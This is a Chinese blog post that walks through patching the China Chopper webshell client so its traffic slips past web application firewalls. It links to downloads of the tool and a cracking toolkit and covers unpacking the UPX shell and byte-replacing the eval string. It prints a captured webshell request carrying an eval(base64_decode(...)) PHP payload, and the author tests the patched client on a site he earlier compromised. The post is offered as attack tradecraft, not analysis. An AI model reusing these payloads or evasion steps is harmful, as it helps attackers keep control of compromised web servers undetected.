Bypass菜刀进化成过Waf刀

  1. 前言
    1. 正文:

前言

首先我要在这里大肆吐槽,今天的底层软件好像都在刁难我。首先是用UPX脱壳工具
把菜刀脱坏掉了,然后重新下一个。在换一个脱没毛病,用C32asm进行字符替换的时候不给我替换。我特么。。。后面还是用Hxdx64进行替换的,我也是醉了。

正式进入贪婪之岛篇!

正文:

bypass菜刀教程:https://github.com/admintony/BypassCaiDao

首先你要有把2010年的菜刀,因为16年的菜刀的数据包不同,然后你还需要一些底层工具。

2010菜刀:链接: https://pan.baidu.com/s/1jvECLJjpsh4OsclZFHkv8g 密码: 6n1h
吾爱破解工具包:链接:https://pan.baidu.com/s/1nwJg0eX  密码: iuj3
WSExplorer抓包工具:https://blog.mycike.com/154.html

我们首先把菜刀的UPX壳给脱了,这里我就不说了。自己脱掉就行

脱壳:

然后我们启动WSExplorer抓包工具,选择菜刀想进程进行抓包(用菜刀连shell)

然后我们可以看到图上抓到的包

x=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

这里引用文章的解释:

x 是shell的密码,其中的数据是让shell再接收一个z0
z0 中存放着执行命令,列目录,修改文件等操作的PHP代码,并试用base64加密数据.

然后文章把User-Agent头也改了,这里我就不改了。因为我获取了文件偏移地址但不会转为内存偏移地址(手动滑稽)

我们直接修改第一个参数数据:
首先用C32asm搜索:@eval(base64_decode($POST[z0])); 替换成Dizep,fewi:8chigshi,(cTSWX~4a–?(我这里的C32asm刁难我)

用HxDx64来替换

然后找一个有waf的站来测试,就用我之前过安全狗文件上传的那个站吧

(如果用普通的刀和一句话连的话和上图一样)

转载请注明转自:422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Bypass菜刀进化成过Waf刀

本文作者:九世

发布时间:2018-08-21, 15:18:03

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/ec776b6d.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录